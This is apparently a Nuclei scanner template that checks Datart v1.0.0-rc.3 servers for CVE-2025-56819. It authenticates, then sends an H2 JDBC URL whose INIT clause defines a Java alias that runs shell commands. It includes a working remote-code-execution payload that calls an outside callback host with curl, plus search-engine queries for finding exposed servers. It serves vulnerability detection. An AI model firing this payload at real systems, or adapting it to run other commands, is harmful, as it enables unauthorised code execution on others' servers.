id: CVE-2025-56819

info:
  name: Datart v1.0.0-rc.3 - Remote Code Execution
  author: Redmomn
  severity: critical
  description: |
    Datart v1.0.0-rc.3 contains a vulnerability that allows remote attackers to execute arbitrary code via INIT connection parameters.
  reference:
    - https://github.com/advisories/GHSA-623q-jr4p-f87c
    - https://github.com/xyyzxc/CVE-2025-56819
    - https://nvd.nist.gov/vuln/detail/CVE-2025-56819
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-56819
    epss-score: 0.11188
    epss-percentile: 0.93687
    cwe-id: CWE-78
    cpe: cpe:2.3:a:running-elephant:datart:1.0.0:rc3:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: datart
    product: datart
    fofa-query: 'title="Datart"'
    shodan-query: 'title:"Datart"'
    hunter-query: 'web.title="Datart"'
  tags: cve,cve2025,datart,rce,h2,jdbc,oast,authentication

variables:
  rand_alias: '{{rand_text_alpha(8)}}'

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/users/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "email\":", "data\":{")'
          - 'status_code == 200'
        internal: true

    extractors:
      - type: kval
        name: token
        part: header
        kval:
          - authorization
        internal: true

  - raw:
      - |
        POST /api/v1/data-provider/test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: {{token}}

        {
          "name": "jdbc-data-provider",
          "type": "JDBC",
          "properties": {
            "dbType": "H2",
            "url": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS {{rand_alias}} AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL {{rand_alias}} ('curl {{interactsh-url}}')\\;",
            "user": null,
            "password": "",
            "driverClass": "org.h2.Driver",
            "serverAggregate": false,
            "enableSpecialSQL": false,
            "enableSyncSchemas": true,
            "syncInterval": "60",
            "properties": {}
          }
        }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - 'dns'

    extractors:
      - type: json
        part: body
        name: message
        json:
          - '.message'
        internal: true
# digest: 4b0a00483046022100f2d6a7cc76f1eb59686242c3094bd50f4789419f608bd43f1f94d8c4d122d151022100e92b91a0e97acf9458a22dd7ff0fe1f9dc235d7a9f8fbd8fbcb8d311db868493:922c64590222798bb761d5b6d8e72950